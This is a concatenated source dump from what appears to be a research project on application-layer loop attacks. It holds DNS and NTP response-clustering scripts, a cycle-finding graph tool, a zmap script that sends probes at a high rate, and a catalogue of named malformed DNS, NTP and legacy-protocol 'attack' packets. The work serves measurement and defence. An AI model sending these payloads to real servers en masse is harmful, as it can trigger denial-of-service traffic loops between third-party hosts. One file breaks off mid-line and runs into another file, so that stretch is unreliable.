566 | import sys 567 | 568 | if len(sys.argv)!=4: 569 | print('python3 dns_clustering.py ') 570 | exit(-1) 571 | 572 | scan_table_name = sys.argv[1] 573 | cluster_table_name = sys.argv[2] 574 | type_summary_id_mapping_dict = sys.argv[3] 575 | do_cluster(scan_table_name,cluster_table_name,type_summary_id_mapping_dict) 576 | 577 | -------------------------------------------------------------------------------- /draw_directed_graph.py: -------------------------------------------------------------------------------- 1 | import networkx as nx 2 | import psycopg2 3 | import pickle 4 | import math 5 | import tabulate 6 | import sys 7 | 8 | if len(sys.argv)!=4: 9 | print('python3 draw_directed_graph.py ') 10 | 11 | loop_probe_table = sys.argv[1] 12 | loop_probe_cluster_table = sys.argv[2] 13 | ip_pair_file = sys.argv[3] 14 | 15 | 16 | 17 | def simple_cycles(G, limit): 18 | # code from stack_overflow, we are using an outdated networkx (Debian doens't have the latest version) 19 | # https://stackoverflow.com/questions/46590502/how-to-modify-johnsons-elementary-cycles-algorithm-to-cap-maximum-cycle-length 20 | subG = type(G)(G.edges()) 21 | sccs = list(nx.strongly_connected_components(subG)) 22 | while sccs: 23 | scc = sccs.pop() 24 | startnode = scc.pop() 25 | path = [startnode] 26 | blocked = set() 27 | blocked.add(startnode) 28 | stack = [(startnode, list(subG[startnode]))] 29 | 30 | while stack: 31 | thisnode, nbrs = stack[-1] 32 | 33 | if nbrs and len(path) < limit: 34 | nextnode = nbrs.pop() 35 | if nextnode == startnode: 36 | yield path[:] 37 | elif nextnode not in blocked: 38 | path.append(nextnode) 39 | stack.append((nextnode, list(subG[nextnode]))) 40 | blocked.add(nextnode) 41 | continue 42 | if not nbrs or len(path) >= limit: 43 | blocked.remove(thisnode) 44 | stack.pop() 45 | path.pop() 46 | subG.remove_node(startnode) 47 | H = subG.subgraph(scc) 48 | sccs.extend(list(nx.strongly_connected_components(H))) 49 | 50 | def get_edge_info(scan_2nd_table_name,cluster_table_name): 51 | db_name = "loop_scan" 52 | db_conn = psycopg2.connect(database=db_name, user="scan") 53 | db_conn.autocommit = True 54 | cursor = db_conn.cursor() 55 | 56 | select_command = "SELECT attack_name as input_id, type_id as output_id,IP_list,ARRAY_LENGTH(IP_list,1) \ 57 | FROM (SELECT attack_name,type_id,ARRAY_AGG(DISTINCT rsp_src_ip) as IP_list\ 58 | FROM (SELECT attack_name, rsp_src_ip, type_id FROM %s\ 59 | JOIN %s ON 
payload=rsp_payload) AS temp GROUP BY attack_name,type_id)\ 60 | AS TEMP2 ORDER bY ARRAY_LENGTH(IP_list,1) DESC;" % (scan_2nd_table_name,cluster_table_name) 61 | 62 | 63 | cursor.execute(select_command) 64 | data = cursor.fetchall() 65 | 66 | 67 | 68 | 69 | edges = [] 70 | edges_attr = {} 71 | for item in data: 72 | edges.append((int(item[0]),int(item[1]))) 73 | edges_attr[str(item[0]) + ":" + str(item[1])] = (item[2],len(item[2])) 74 | 75 | return edges,edges_attr 76 | 77 | 78 | def build_directed_graph(nodes,edges): 79 | G = nx.DiGraph() 80 | G.add_nodes_from(nodes) 81 | G.add_edges_from(edges) 82 | return G 83 | 84 | 85 | 86 | def get_from_edges_attr(edges_attr,start,end): 87 | return edges_attr[str(start)+':'+str(end)] 88 | 89 | def simplify_graph(graph,edges_attr): 90 | simplified_nodes = set() 91 | simplified_edges = set() 92 | all_ips_affected = set() 93 | cycle_ip_dict = {} 94 | 95 | nx.simple_cycles = simple_cycles 96 | cycles = nx.simple_cycles(graph,5) 97 | 98 | table_headers = ['cycle','number of involved IPs','min edge IP amount','min edge','number of pairs'] 99 | print_lines = [] 100 | 101 | 102 | for cycle in cycles: 103 | 104 | if len(cycle)==1: 105 | simplified_nodes.add(cycle[0]) 106 | simplified_edges.add((cycle[0],cycle[0])) 107 | edge_attr = get_from_edges_attr(edges_attr,cycle[0],cycle[0]) 108 | if edge_attr[1]<100: 109 | continue 110 | cycle.append(cycle[0]) 111 | print_lines.append([cycle,edge_attr[1],edge_attr[1],[cycle[0],cycle[0]],int(math.factorial(edge_attr[1])/(2*math.factorial(edge_attr[1]-2)))]) 112 | 113 | all_ips_affected.update(edge_attr[0]) 114 | cycle_ip_dict[str(cycle)] = (edge_attr[0],edge_attr[0]) 115 | 116 | 117 | elif len(cycle)==2: 118 | simplified_nodes.add(cycle[0]) 119 | simplified_nodes.add(cycle[1]) 120 | simplified_edges.add((cycle[0],cycle[1])) 121 | simplified_edges.add((cycle[1],cycle[0])) 122 | edge_A_attr = get_from_edges_attr(edges_attr,cycle[0],cycle[1]) 123 | edge_B_attr = get_from_edges_attr(edges_attr,cycle[1],cycle[0]) 124 | if edge_A_attr[1]<100 or edge_B_attr[1]<100: 125 | continue 126 | cycle.append(cycle[0]) 127 | affected_IPs = set(edge_A_attr[0]) 128 | affected_IPs.update(edge_B_attr[0]) 129 | if edge_A_attr[1]<=edge_B_attr[1]: 130 | print_lines.append([cycle,len(affected_IPs),min(edge_A_attr[1],edge_B_attr[1]),[cycle[0],cycle[1]],edge_A_attr[1]*edge_B_attr[1]-len(set(edge_A_attr[0]).intersection(set(edge_B_attr[0])))*len(set(edge_A_attr[0]).intersection(set(edge_B_attr[0])))]) 131 | else: 132 | print_lines.append([cycle,len(affected_IPs),min(edge_A_attr[1],edge_B_attr[1]),[cycle[1],cycle[0]],edge_A_attr[1]*edge_B_attr[1]-len(set(edge_A_attr[0]).intersection(set(edge_B_attr[0])))*len(set(edge_A_attr[0]).intersection(set(edge_B_attr[0])))]) 133 | 134 | all_ips_affected.update(affected_IPs) 135 | cycle_ip_dict[str(cycle)] = (edge_A_attr[0],edge_B_attr[0]) 136 | 137 | else: 138 | temp_edge_list_A = set() 139 | temp_edge_list_B = set() 140 | cycle.append(cycle[0]) 141 | min_number = 0 142 | min_edge = None 143 | 144 | try: 145 | for i in range(0,len(cycle)): 146 | if i==len(cycle)-1: 147 | break 148 | if i==0: 149 | edge_attr = get_from_edges_attr(edges_attr,cycle[i],cycle[i+1]) 150 | temp_edge_list_A.update(edge_attr[0]) 151 | min_number = edge_attr[1] 152 | min_edge=[cycle[i],cycle[i+1]] 153 | elif i==1: 154 | edge_attr = get_from_edges_attr(edges_attr,cycle[i],cycle[i+1]) 155 | temp_edge_list_B.update(edge_attr[0]) 156 | if edge_attr[1] num_allowed_ips): 33 | num_probes = num_allowed_ips 34 | if DEBUG: 
logging.debug("FINISHED: counting lines in allowlist.\n") 35 | 36 | responses_storage_name = proto + "_target_" + attack_pkts_proto + "_pkts__rsps__" + str(num_probes) + "_probed_" + trunc_timestamp 37 | 38 | 39 | create_new_table_sql = "CREATE TABLE IF NOT EXISTS " + responses_storage_name + "(saddr inet NOT NULL,\ 40 | data text NOT NULL, attack_name text NOT NULL, index text NOT NULL);" 41 | if DEBUG: logging.debug("START: creating sql responses table.") 42 | db_cursor.execute(create_new_table_sql) 43 | if DEBUG: logging.debug("FINISHED: creating sql responses table.\n") 44 | 45 | f = open(attack_pkts_proto + '_payload.pkl','rb') 46 | attacks = pickle.load(f) 47 | 48 | sending_port = 50000 49 | 50 | for attack_name in attacks: 51 | attack_pkts = attacks[attack_name] 52 | 53 | for index in range(0, len(attack_pkts)): 54 | attack_pkt = attack_pkts[index] 55 | if DEBUG: logging.debug("---------- PROBE: " + attack_name + " ----------\n") 56 | sending_port += 1 57 | 58 | # the server might deploy source port filtering -> to filter out well-known port number 59 | # if you want to get rid of these cases, uncomment the following code 60 | # proto_to_port = { "dns" : 53, "ntp" : 123, "tftp" : 69 } 61 | # target_port = proto_to_port[proto] 62 | # sending_port = proto_to_port[proto] 63 | 64 | 65 | # one could use the following output filter: 66 | # --output-fields=\"saddr,sport,dport,data\" \\\n\ 67 | # --output-filter=\"sport=" + str(proto_to_port[proto]) + " && dport=" + str(sending_port) + " && success=1 && repeat=0\" \\\n\ 68 | # In case some UDP server (e.g., TFTP server) will use random port to send response. 69 | 70 | # ----------------------- PROBE IPS W/ ATTACK PACKET ----------------------- 71 | scan_script_str = "#!/usr/bin/env bash\n\ 72 | WHITELIST=allowlist_" + proto + ".txt\n\ 73 | BLACKLIST=blacklist.txt\n\ 74 | box_config=box.config\n\ 75 | responses_dir_path=rsps/" + responses_storage_name + "\n\ 76 | mkdir -p $responses_dir_path\n\ 77 | set -o pipefail &&\n\ 78 | /usr/local/sbin/zmap \\\n\ 79 | --config=$box_config \\\n\ 80 | --target-port=" + str(target_port) + " \\\n\ 81 | --source-port=" + str(sending_port) + " \\\n\ 82 | --allowlist-file=${WHITELIST} \\\n\ 83 | --blocklist-file=${BLACKLIST} \\\n\ 84 | --rate=100000 \\\n\ 85 | --sender-threads=1 \\\n\ 86 | --max-targets=" + str(num_probes) + " \\\n\ 87 | --cooldown-time=10 \\\n\ 88 | --seed=85 \\\n\ 89 | --probes=1 \\\n\ 90 | --probe-module=udp \\\n\ 91 | --probe-args=hex:" + attack_pkt.strip() + " \\\n\ 92 | --output-module=csv \\\n\ 93 | --output-fields=\"saddr,data\" \\\n\ 94 | --output-filter=\"\" \\\n\ 95 | --verbosity=0 \\\n\ 96 | --quiet \\\n\ 97 | --disable-syslog \\\n\ 98 | --ignore-blocklist-errors \\\n\ 99 | > ${responses_dir_path}/" + attack_name + "_responses.csv" 100 | 101 | if DEBUG: logging.debug("START: write zmap script to .sh file.") 102 | scan_script_f = open("zmap_scan.sh", "w") 103 | scan_script_f.write(scan_script_str) 104 | scan_script_f.close() 105 | if DEBUG: logging.debug("FINISHED: write zmap script to .sh file.\n") 106 | 107 | if DEBUG: logging.debug("START: call zmap on a single attack packet.") 108 | call(['/bin/bash', 'zmap_scan.sh']) 109 | if DEBUG: logging.debug("FINISHED: call zmap on a single attack packet.\n") 110 | 111 | time.sleep(5) 112 | 113 | # ---------------------------- SAVE RESPONSES ---------------------------------- 114 | 115 | if DEBUG: logging.debug("START: read csv into pandas dataframe.") 116 | csv_path = os.getcwd() + "/rsps/" + responses_storage_name + "/" + attack_name + 
"_responses.csv" 117 | zmap_df = pd.read_csv(csv_path) 118 | 119 | if DEBUG: logging.debug("FINISHED: read csv into pandas dataframe.") 120 | zmap_df['attack_name'] = attack_name 121 | zmap_df['index'] = str(index) 122 | # zmap_df = zmap_df.drop(['sport','dport'],axis=1) 123 | if DEBUG: logging.debug("FINISHED: add attack column to csv.") 124 | zmap_df.to_csv(csv_path, index=False) 125 | if DEBUG: logging.debug("FINISHED: convert dataframe back to csv.\n") 126 | 127 | transfer_sql = "COPY " + responses_storage_name + "(saddr, data, attack_name, index) FROM '" + csv_path + "' DELIMITER ',' CSV HEADER WHERE data IS NOT NULL;" 128 | if DEBUG: logging.debug("START: copy csv to database.") 129 | db_cursor.execute(transfer_sql) 130 | if DEBUG: logging.debug("FINISHED: copy csv to database.\n") 131 | 132 | 133 | if DEBUG: logging.debug("START: rename two columns in database.") 134 | rename_col1_sql = "ALTER TABLE " + responses_storage_name + " RENAME saddr TO rsp_src_ip;" 135 | db_cursor.execute(rename_col1_sql) 136 | 137 | rename_col2_sql = "ALTER TABLE " + responses_storage_name + " RENAME data TO rsp_payload;" 138 | db_cursor.execute(rename_col2_sql) 139 | if DEBUG: logging.debug("FINISHED: rename two columns in database.\n") 140 | 141 | if DEBUG: logging.debug("START: close database cursor and connection.") 142 | db_cursor.close() 143 | db_conn.close() 144 | if DEBUG: logging.debug("FINISHED: close database cursor and connection.\n") 145 | 146 | print("Probe responses were stored using Postgresql.") 147 | print("\tdatabase name: " + db_name) 148 | print("\ttable name: " + responses_storage_name) -------------------------------------------------------------------------------- /ntp_clustering.py: -------------------------------------------------------------------------------- 1 | from scapy.all import * 2 | import psycopg2 3 | import pickle 4 | import psycopg2.extras 5 | 6 | 7 | def NTP_classifier(payload): 8 | try: 9 | status_bit = '' 10 | status_code = '' 11 | packet = NTPHeader(bytes.fromhex(payload)) 12 | 13 | mode = str(packet.mode) 14 | status_bit = status_bit + mode 15 | status_code = status_code + status_bit 16 | 17 | if status_bit=='6': 18 | try: 19 | packet = NTPControl(bytes.fromhex(payload)) 20 | try: 21 | status_bit = str(packet.zeros).zfill(2) 22 | except: 23 | status_bit = '--' 24 | status_code = status_code + status_bit 25 | 26 | try: 27 | status_bit = str(packet.version).zfill(2) 28 | except: 29 | status_bit = '--' 30 | status_code = status_code + status_bit 31 | 32 | try: 33 | status_bit = str(packet.response).zfill(2) 34 | except: 35 | status_bit = '--' 36 | status_code = status_code + status_bit 37 | 38 | try: 39 | status_bit = str(packet.err).zfill(2) 40 | except: 41 | status_bit = '--' 42 | status_code = status_code + status_bit 43 | 44 | try: 45 | status_bit = str(packet.more).zfill(2) 46 | except: 47 | status_bit = '--' 48 | status_code = status_code + status_bit 49 | 50 | try: 51 | status_bit = str(packet.opcode).zfill(2) 52 | except: 53 | status_bit = '--' 54 | status_code = status_code + status_bit 55 | 56 | try: 57 | status_bit = str(packet.status_word) 58 | except: 59 | status_bit = 'cn' 60 | status_code = status_code + status_bit 61 | 62 | 63 | try: 64 | status_bit = str(packet.status).zfill(4) 65 | except: 66 | status_bit = '----' 67 | status_code = status_code + status_bit 68 | 69 | 70 | try: 71 | if packet.authenticator != '': 72 | status_bit = 'yy' 73 | else: 74 | status_bit = 'nn' 75 | 76 | except: 77 | status_bit = 'cn' 78 | status_code = status_code + 
status_bit 79 | except Exception as e: 80 | status_code = status_code + str(e) 81 | 82 | # elif status_bit=='7': 83 | # try: 84 | # packet = NTPPrivate(bytes.fromhex(payload)) 85 | # try: 86 | # status_bit = str(packet.response).zfill(2) 87 | # except: 88 | # status_bit = '--' 89 | # status_code = status_code + status_bit 90 | 91 | 92 | # try: 93 | # status_bit = str(packet.version).zfill(2) 94 | # except: 95 | # status_bit = '--' 96 | # status_code = status_code + status_bit 97 | 98 | # try: 99 | # status_bit = str(packet.implementation).zfill(4) 100 | # except: 101 | # status_bit = '----' 102 | # status_code = status_code + status_bit 103 | 104 | # try: 105 | # status_bit = str(packet.err).zfill(4) 106 | # except: 107 | # status_bit = '----' 108 | # status_code = status_code + status_bit 109 | 110 | # try: 111 | # status_bit = str(packet.request_code).zfill(4) 112 | # except: 113 | # status_bit = '----' 114 | # status_code = status_code + status_bit 115 | 116 | # except Exception as e: 117 | # status_code = status_code + str(e) 118 | else: 119 | try: 120 | status_bit = str(packet.leap).zfill(2) 121 | except: 122 | status_bit = '--' 123 | status_code = status_code + status_bit 124 | 125 | try: 126 | status_bit = str(packet.version).zfill(2) 127 | except: 128 | status_bit = '--' 129 | status_code = status_code + status_bit 130 | 131 | try: 132 | status_bit = str(packet.stratum).zfill(4) 133 | except: 134 | status_bit = '----' 135 | status_code = status_code + status_bit 136 | 137 | try: 138 | status_bit = str(packet.poll).zfill(4) 139 | except: 140 | status_bit = '----' 141 | status_code = status_code + status_bit 142 | 143 | 144 | # try: 145 | # status_bit = str(packet.ref_id) 146 | # except: 147 | # status_bit = '----' 148 | # status_code = status_code + status_bit 149 | 150 | 151 | return status_code 152 | 153 | except Exception as e: 154 | status_code = str(e) 155 | return status_code 156 | 157 | 158 | def do_cluster(raw_data_table_name,output_mapping_table_name,cluster_payload_pattern_mapping): 159 | db_name = "loop_scan" 160 | db_conn = psycopg2.connect(database=db_name, user="scan") 161 | db_conn.autocommit = True 162 | cursor = db_conn.cursor() 163 | 164 | sql_get_length = "SELECT COUNT(*) FROM %s;" % (raw_data_table_name) 165 | cursor.execute(sql_get_length) 166 | max_item_count = cursor.fetchall()[0][0] 167 | 168 | 169 | status_dict = {} 170 | total_cluster = 0 171 | try: 172 | dict_file = open(cluster_payload_pattern_mapping,'rb') 173 | status_dict = pickle.load(dict_file) 174 | total_clusters = len(status_dict) 175 | dict_file.close() 176 | except: 177 | pass 178 | 179 | 180 | offset = 0 181 | step_size = 10000 182 | progress_count = 0 183 | 184 | 185 | try: 186 | drop_table = "DROP TABLE %s;" % (output_mapping_table_name) 187 | cursor.execute(drop_table) 188 | except: 189 | pass 190 | 191 | create_table = "CREATE TABLE %s (type_id INT,\ 192 | payload TEXT PRIMARY KEY);" % (output_mapping_table_name) 193 | cursor.execute(create_table) 194 | 195 | 196 | insert_command = "INSERT INTO " + output_mapping_table_name + " VALUES %s;" 197 | payload_list = set() 198 | while(True): 199 | if offset > max_item_count: 200 | break 201 | 202 | select_command = "select DISTINCT rsp_payload from %s;" % (raw_data_table_name) 203 | cursor.execute(select_command) 204 | all_data = cursor.fetchall() 205 | 206 | update_list = [] 207 | for data in all_data: 208 | progress_count = progress_count + 1 209 | payload_data = data[0].strip() 210 | total_clusters = len(status_dict.keys()) + 1 211 | 
status_code = NTP_classifier(payload_data) 212 | if len(payload_data) > 2500: 213 | continue 214 | if not status_code in status_dict: 215 | status_dict[status_code] = total_clusters 216 | 217 | update_list.append((status_dict[status_code],payload_data,)) 218 | 219 | temp = psycopg2.extras.execute_values(cursor,insert_command,update_list) 220 | 221 | offset = offset + step_size 222 | break 223 | 224 | 225 | with open(cluster_payload_pattern_mapping,'wb') as f: 226 | pickle.dump(status_dict,f) 227 | f.close() 228 | 229 | 230 | import sys 231 | 232 | if len(sys.argv)!=4: 233 | print('python3 ntp_clustering.py ') 234 | exit(-1) 235 | 236 | scan_table_name = sys.argv[1] 237 | cluster_table_name = sys.argv[2] 238 | type_summary_id_mapping_dict = sys.argv[3] 239 | do_cluster(scan_table_name,cluster_table_name,type_summary_id_mapping_dict) 240 | -------------------------------------------------------------------------------- /proto_attack_profiles.py: -------------------------------------------------------------------------------- 1 | from scapy.all import * 2 | 3 | TEXT = "text" 4 | HEX = "hex" 5 | 6 | def to_hex(pkt): 7 | pkt = linehexdump(pkt, dump=True) 8 | pkt = pkt[:pkt.find(" ")] 9 | pkt = pkt.replace(" ", "") 10 | return pkt 11 | 12 | class Chargen_Attack_Profile: 13 | def __init__(self): 14 | self.port = 19 15 | self.attack_name_to_pkt = {} 16 | self.attack_name_to_format = {} 17 | self.attack_name_to_pkt["random"] = "a" 18 | self.attack_name_to_format["random"] = TEXT 19 | 20 | class Qotd_Attack_Profile: 21 | def __init__(self): 22 | self.port = 17 23 | self.attack_name_to_pkt = {} 24 | self.attack_name_to_format = {} 25 | self.attack_name_to_pkt["random"] = "a" 26 | self.attack_name_to_format["random"] = TEXT 27 | 28 | class Echo_Attack_Profile: 29 | def __init__(self): 30 | self.port = 7 31 | self.attack_name_to_pkt = {} 32 | self.attack_name_to_format = {} 33 | self.attack_name_to_pkt["random"] = "a" 34 | self.attack_name_to_format["random"] = TEXT 35 | 36 | class Daytime_Attack_Profile: 37 | def __init__(self): 38 | self.port=13 39 | self.attack_name_to_pkt = {} 40 | self.attack_name_to_format = {} 41 | 42 | self.attack_name_to_pkt['noempty'] = 'a' 43 | self.attack_name_to_format['noempty'] = TEXT 44 | 45 | class Time_Attack_Profile: 46 | def __init__(self): 47 | self.port=37 48 | self.attack_name_to_pkt = {} 49 | self.attack_name_to_format = {} 50 | 51 | self.attack_name_to_pkt['noempty'] = 'a' 52 | self.attack_name_to_format['noempty'] = TEXT 53 | 54 | class Auser_Attack_Profile: 55 | def __init__(self): 56 | self.port=11 57 | self.attack_name_to_pkt = {} 58 | self.attack_name_to_format = {} 59 | 60 | self.attack_name_to_pkt['noempty'] = 'a' 61 | self.attack_name_to_format['noempty'] = TEXT 62 | 63 | class DNS_Attack_Profile: 64 | def __init__(self): 65 | self.port = 53 # Port corresponding to the protocol. 66 | 67 | self.attack_name_to_pkt = {} # Stores the attack packets that can be 68 | # sent to create a loop attack by 69 | # abusing dns protocol implementations. 70 | self.attack_name_to_format = {} # Maps each attack in 71 | # 'attack_name_to_pkt' to the packet's 72 | # format (format options in 73 | # class Attack_Pkt_Format()). 
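        # NOTE (illustrative sketch, not a shipped probe): adding a new
        # discovery probe only needs two entries here, the payload and its
        # format. The name "my_probe" and its payload below are hypothetical:
        #
        #   self.attack_name_to_pkt["my_probe"] = to_hex(DNS(qd=DNSQR(qname="our domain", qtype=1)))
        #   self.attack_name_to_format["my_probe"] = HEX
        #
        # discovery_probe.py iterates over attack_name_to_pkt and passes each
        # entry to zmap as --probe-args=<format>:<payload>.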
74 | 75 | 76 | # ----------------------- Query Based ---------------------------------- 77 | 78 | self.attack_name_to_pkt["test1"] = "860c010000010000000000000a6f757220646f6d61696e0000010001" 79 | self.attack_name_to_format["test1"] = HEX 80 | 81 | self.attack_name_to_pkt["test2"] = "a745008000010000000000000a6f757220646f6d61696e0000010001" 82 | self.attack_name_to_format["test2"] = HEX 83 | 84 | self.attack_name_to_pkt["bad_req_hdr1"] = "000001000001000000000000" 85 | self.attack_name_to_format["bad_req_hdr1"] = HEX 86 | 87 | self.attack_name_to_pkt["bad_req_hdr2"] = "06361706026465000001" 88 | self.attack_name_to_format["bad_req_hdr2"] = HEX 89 | 90 | self.attack_name_to_pkt["bad_req_hdr3"] = "b0b506b3b6c973701d6102c6465f00001c0001" 91 | self.attack_name_to_format["bad_req_hdr3"] = HEX 92 | 93 | self.attack_name_to_pkt["bad_req_hdr4"] = "fb6c6072b9037469612a2ddd6f73536f372264650000410001" 94 | self.attack_name_to_format["bad_req_hdr4"] = HEX 95 | 96 | self.attack_name_to_pkt["bad_req_hdr5"] = "860c610000010000000000000a6f757220646f6d61696e0000010001" 97 | self.attack_name_to_format["bad_req_hdr5"] = HEX 98 | 99 | 100 | self.attack_name_to_pkt["bad_req_qr1"] = "0000010000010000000000000a6f757220646f6d61696e0001180118" 101 | self.attack_name_to_format["bad_req_qr1"] = HEX 102 | 103 | self.attack_name_to_pkt["bad_req_qr2"] = to_hex(DNS(qd=DNSQR(qname='m', qtype=280, qclass=280))) 104 | self.attack_name_to_format["bad_req_qr2"] = HEX 105 | 106 | 107 | # ------------------------ Response Based---- ------------------------ 108 | self.attack_name_to_pkt["good_rsp"] = "0000818000010001000000000a6f757220646f6d61696e00000100010a6f757220646f6d61696e00000100010000003c000401020304" 109 | self.attack_name_to_format["good_rsp"] = HEX 110 | 111 | self.attack_name_to_pkt["bad_rsp_hdr1"] = "7b0a818000010000000000000a6f757220646f6d61696e00000100010a6f757220646f6d61696e00000100010000003c000401020304" 112 | self.attack_name_to_format["bad_rsp_hdr1"] = HEX 113 | 114 | self.attack_name_to_pkt["bad_rsp_hdr2"] = "00b5a44818010001c030a00f23789000b1001c006f757220646f6d61696e2e00001c0001c00c00060001000000f50038036e732e0078957d1500002a3000000e1000093a8000007080" 115 | self.attack_name_to_format["bad_rsp_hdr2"] = HEX 116 | 117 | self.attack_name_to_pkt["bad_rsp_hdr3"] = "9309c18000010001000000000a6f757220646f6d61696e00000100010a6f757220646f6d61696e00000100010000003c000401020304" 118 | self.attack_name_to_format["bad_rsp_hdr3"] = HEX 119 | 120 | self.attack_name_to_pkt["bad_rsp_hdr4"] = "0000818f00010001000000000a6f757220646f6d61696e00000100010a6f757220646f6d61696e00000100010000003c000401020304" 121 | self.attack_name_to_format["bad_rsp_hdr4"] = HEX 122 | 123 | 124 | self.attack_name_to_pkt["bad_rsp_hdr5"] = "a745010000010001000000000a6f757220646f6d61696e00000100010a6f757220646f6d61696e0000010001000100b1000401020304" 125 | self.attack_name_to_format["bad_rsp_hdr5"] = HEX 126 | 127 | self.attack_name_to_pkt["bad_rsp_rr1"] = to_hex(DNS(qd=DNSRR(type=280, rclass=280))) 128 | self.attack_name_to_format["bad_rsp_rr1"] = HEX 129 | 130 | self.attack_name_to_pkt["bad_rsp_rr2"] = to_hex(DNS(qd=DNSRR(rrname='m', type=280, rclass=280))) 131 | self.attack_name_to_format["bad_rsp_rr2"] = HEX 132 | 133 | 134 | self.attack_name_to_pkt["bad_rsp_hdr_rr1"] = "a74581800001000100000000c00c00010001000100b10004d415a572" 135 | self.attack_name_to_format["bad_rsp_hdr_rr1"] = HEX 136 | 137 | self.attack_name_to_pkt["bad_rsp_hdr_rr2"] = "a74581800000000100000000046f757220646f6d61696e0000010001c00c00010001000100b10004d415a572" 138 | 
self.attack_name_to_format["bad_rsp_hdr_rr2"] = HEX 139 | 140 | self.attack_name_to_pkt["bad_rsp_hdr_rr3"] = "75a223cf47d3f2c40b889c" + to_hex(DNSRR(rrname='m', type=280, rclass=280)) 141 | self.attack_name_to_format["bad_rsp_hdr_rr3"] = HEX 142 | 143 | 144 | # ---------------------------- ERRORS ---------------------------------- 145 | self.attack_name_to_pkt["err1"] = "6974818100010000000000000a6f757220646f6d61696e0000010001" 146 | self.attack_name_to_format["err1"] = HEX 147 | 148 | self.attack_name_to_pkt["err2"] = "7d9a818200010000000000000a6f757220646f6d61696e0000410001" 149 | self.attack_name_to_format["err2"] = HEX 150 | 151 | self.attack_name_to_pkt["err3"] = "6974818300010000000000000a6f757220646f6d61696e0000010001" 152 | self.attack_name_to_format["err3"] = HEX 153 | 154 | self.attack_name_to_pkt["err4"] = "6974818400010000000000000a6f757220646f6d61696e0000010001" 155 | self.attack_name_to_format["err4"] = HEX 156 | 157 | self.attack_name_to_pkt["err5"] = "6974818500010000000000000a6f757220646f6d61696e0000010001" 158 | self.attack_name_to_format["err5"] = HEX 159 | 160 | class NTP_Attack_Profile: 161 | def __init__(self): 162 | self.port = 123 163 | 164 | self.attack_name_to_pkt = {} # Stores the attack packets that can be 165 | # sent to create a loop attack by 166 | # abusing protocol implementations. 167 | self.attack_name_to_format = {} # Maps each attack in 168 | # 'attack_name_to_pkt' to the packet's 169 | # format (format options are constants 170 | # at the top of this file). 171 | 172 | # ------------------ Server Mode ----------------------------------------- 173 | self.attack_name_to_pkt["stratum1"] = to_hex(NTPHeader(mode=4, stratum=14)) 174 | self.attack_name_to_format["stratum1"] = HEX 175 | 176 | self.attack_name_to_pkt["stratum2"] = to_hex(NTPHeader(mode=4, stratum=15)) 177 | self.attack_name_to_format["stratum2"] = HEX 178 | 179 | self.attack_name_to_pkt["stratum3"] = to_hex(NTPHeader(mode=4, stratum=16)) 180 | self.attack_name_to_format["stratum3"] = HEX 181 | 182 | self.attack_name_to_pkt["kiss_xxxx_s"] = to_hex(NTPHeader(mode=4, stratum=0, ref_id="XXXX")) 183 | self.attack_name_to_format["kiss_xxxx_s"] = HEX 184 | 185 | self.attack_name_to_pkt["kiss_abcd_s"] = to_hex(NTPHeader(mode=4, stratum=0, ref_id="ABCD")) 186 | self.attack_name_to_format["kiss_abcd_s"] = HEX 187 | 188 | 189 | # -------------------- broadcast ----------------------------------------- 190 | self.attack_name_to_pkt["bcast"] = to_hex(NTPHeader(mode=5)) 191 | self.attack_name_to_format["bcast"] = HEX 192 | 193 | 194 | # -------------------- Control message ----------------------------------- 195 | 196 | self.attack_name_to_pkt["cntrl_zer"] = to_hex(NTPControl(zeros=1)) 197 | self.attack_name_to_format["cntrl_zer"] = HEX 198 | 199 | self.attack_name_to_pkt["cntrl_err1"] = to_hex(NTPControl(err=1, response=1)) 200 | self.attack_name_to_format["cntrl_err1"] = HEX 201 | 202 | self.attack_name_to_pkt["cntrl_err2"] = to_hex(NTPControl(err=1)) 203 | self.attack_name_to_format["cntrl_err2"] = HEX 204 | 205 | self.attack_name_to_pkt["cntrl_opcode1"] = to_hex(NTPControl(op_code=31)) 206 | self.attack_name_to_format["cntrl_opcode1"] = HEX 207 | 208 | self.attack_name_to_pkt["cntrl_opcode2"] = to_hex(NTPControl(op_code=31, data="iyQo7zCkRZOuGqu")) 209 | self.attack_name_to_format["cntrl_opcode2"] = HEX 210 | 211 | self.attack_name_to_pkt["cntrl_opcode3"] = to_hex(NTPControl(op_code=5, data="iyQo7zCkRZOuGqu")) 212 | self.attack_name_to_format["cntrl_opcode3"] = HEX 213 | 214 | 
self.attack_name_to_pkt["cntrl_opcode4"] = to_hex(NTPControl(op_code=7, data="iyQo7zCkRZOuGqu")) 215 | self.attack_name_to_format["cntrl_opcode4"] = HEX 216 | 217 | self.attack_name_to_pkt["cntrl_opcode5"] = to_hex(NTPControl(response=1, op_code=7)) 218 | self.attack_name_to_format["cntrl_opcode5"] = HEX 219 | 220 | self.attack_name_to_pkt["cntrl_sys_stat"] = to_hex(NTPControl(err=1, response=1, status_word=NTPSystemStatusPacket(system_event_code=7))) 221 | self.attack_name_to_format["cntrl_sys_stat"] = HEX 222 | 223 | self.attack_name_to_pkt["cntrl_err_stat1"] = to_hex(NTPControl(err=1, response=1, status_word=NTPErrorStatusPacket(error_code=1))) 224 | self.attack_name_to_pkt["cntrl_err_stat2"] = to_hex(NTPControl(err=1, response=1, status_word=NTPErrorStatusPacket(error_code=2))) 225 | self.attack_name_to_pkt["cntrl_err_stat3"] = to_hex(NTPControl(err=1, response=1, status_word=NTPErrorStatusPacket(error_code=3))) 226 | self.attack_name_to_pkt["cntrl_err_stat4"] = to_hex(NTPControl(err=1, response=1, status_word=NTPErrorStatusPacket(error_code=4))) 227 | self.attack_name_to_pkt["cntrl_err_stat5"] = to_hex(NTPControl(err=1, response=1, status_word=NTPErrorStatusPacket(error_code=5))) 228 | self.attack_name_to_pkt["cntrl_err_stat6"] = to_hex(NTPControl(err=1, response=1, status_word=NTPErrorStatusPacket(error_code=6))) 229 | self.attack_name_to_pkt["cntrl_err_stat7"] = to_hex(NTPControl(err=1, response=1, status_word=NTPErrorStatusPacket(error_code=7))) 230 | self.attack_name_to_pkt["cntrl_err_stat8"] = to_hex(NTPControl(err=1, response=1, status_word=NTPErrorStatusPacket(error_code=200))) 231 | 232 | self.attack_name_to_format["cntrl_err_stat1"] = HEX 233 | self.attack_name_to_format["cntrl_err_stat2"] = HEX 234 | self.attack_name_to_format["cntrl_err_stat3"] = HEX 235 | self.attack_name_to_format["cntrl_err_stat4"] = HEX 236 | self.attack_name_to_format["cntrl_err_stat5"] = HEX 237 | self.attack_name_to_format["cntrl_err_stat6"] = HEX 238 | self.attack_name_to_format["cntrl_err_stat7"] = HEX 239 | self.attack_name_to_format["cntrl_err_stat8"] = HEX 240 | 241 | 